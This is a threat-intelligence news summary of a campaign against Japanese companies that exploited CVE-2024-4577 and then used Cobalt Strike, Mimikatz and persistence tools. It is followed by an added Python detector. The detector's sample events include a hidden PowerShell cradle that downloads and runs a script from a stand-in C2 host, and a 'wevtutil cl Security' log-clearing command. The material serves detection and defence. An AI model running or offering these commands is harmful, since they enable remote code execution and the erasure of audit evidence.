Cobalt Strike Used in Targeting Japanese Companies by Attackers

A sophisticated cyber-intrusion campaign targeting organizations in Japan has been identified by threat analysts, with a focus on sectors such as technology, telecommunications, entertainment, education, and e-commerce. The campaign, discovered by Cisco Talos, exploited a remote code execution (RCE) flaw in the PHP-CGI implementation on Windows, known as CVE-2024-4577, to gain initial access to targeted entities.

Once inside the systems, the attackers proceeded to deploy Cobalt Strike reverse HTTP shellcode using PowerShell scripts, ensuring continuous remote access. Their post-exploitation activities included privilege escalation, credential theft, and lateral movement using plugins from the publicly available Cobalt Strike kit “TaoWu.”

In their attack strategy, the threat actors utilized a Python exploit script to test for vulnerabilities and injected PowerShell commands into the victim’s machines to download payloads from their command-and-control (C2) server. Privilege escalation was achieved using exploits such as JuicyPotato, RottenPotato, and SweetPotato, while persistence mechanisms involved registry modifications, scheduled tasks, and system process creation.

To evade detection, the attackers cleared Windows event logs using wevtutil commands and conducted network reconnaissance using tools like fscan.exe and Seatbelt.exe. Credential theft was carried out through the use of Mimikatz to dump NTLM hashes and plaintext passwords.

The attackers also employed Ladon.exe to bypass User Account Control (UAC) and execute payloads discreetly, as well as SharpTask.exe, SharpHide.exe, and SharpStay.exe to manipulate registry keys and establish persistent services. For lateral movement, Group Policy Objects (GPOs) were abused using SharpGPOAbuse.exe, allowing the execution of malicious scripts across compromised networks.

Furthermore, the attackers misused cloud-based adversarial frameworks, utilizing containers on Alibaba Cloud to deploy offensive security tools. These tools included Blue-Lotus, a JavaScript webshell for XSS and browser exploitation, BeEF for browser exploitation, and Viper C2, a control framework supporting payload execution on multiple platforms.

Although the tactics used in the attack bear similarities to those of the You Dun (Dark Cloud Shield) hacker group, no definitive attribution has been made. However, analysts have noted resemblances in Cobalt Strike usage, privilege escalation techniques, and credential harvesting strategies.

In light of this sophisticated cyber-intrusion campaign, organizations are advised to patch systems promptly to address CVE-2024-4577, restrict PowerShell execution using group policies, monitor logs for unauthorized registry modifications, and deploy endpoint detection and response (EDR) solutions to detect Cobalt Strike activity. The campaign underscores the need for organizations to remain vigilant against evolving adversarial tactics, especially those that target public-facing applications for initial access.
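Detection logic for three of the behaviours described above (wevtutil log clearing, PowerShell download cradles fetching payloads from a C2 server, and a PHP-CGI worker spawning a shell as a CVE-2024-4577 foothold), as an added Python example that is not part of the Cisco Talos report; the process-creation events and the list of web-server parent processes are constructed assumptions.

```python
# Added example, not Cisco Talos code; all events below are constructed.
import ntpath
import re

# Constructed Sysmon-style ProcessCreate records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wevtutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wevtutil cl Security"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\php\php-cgi.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://c2.example.invalid/p.ps1'))\""},
    {"Image": r"C:\Windows\System32\wevtutil.exe",   # benign log query
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wevtutil qe Application /c:5"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Process"},
]

# "wevtutil cl"/"clear-log" is the log-clearing use the article reports.
LOG_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.IGNORECASE)
# Common PowerShell download cradles (payload pulled from a C2 over HTTP).
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                    r"Net\.WebClient|Start-BitsTransfer", re.IGNORECASE)
# A PHP-CGI worker spawning a shell is the CVE-2024-4577 foothold pattern;
# the parent list is an assumption, extend it to match your web stack.
WEB_PARENTS = {"php-cgi.exe", "php.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

def detect(event):
    """Return the names of the rules a single event trips."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmd = event["CommandLine"]
    hits = []
    if image == "wevtutil.exe" and LOG_CLEAR.search(cmd):
        hits.append("event_log_cleared")
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE.search(cmd):
        hits.append("powershell_download_cradle")
    if parent in WEB_PARENTS and image in SHELLS:
        hits.append("webserver_spawned_shell")
    return hits

def scan(events):
    """Map each suspicious command line to the rules it tripped."""
    return {e["CommandLine"]: detect(e) for e in events if detect(e)}
```

The benign `wevtutil qe` query and the plain `Get-Process` invocation are included to show that the rules key on the clearing subcommand and the download verbs, not on the binary name alone.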
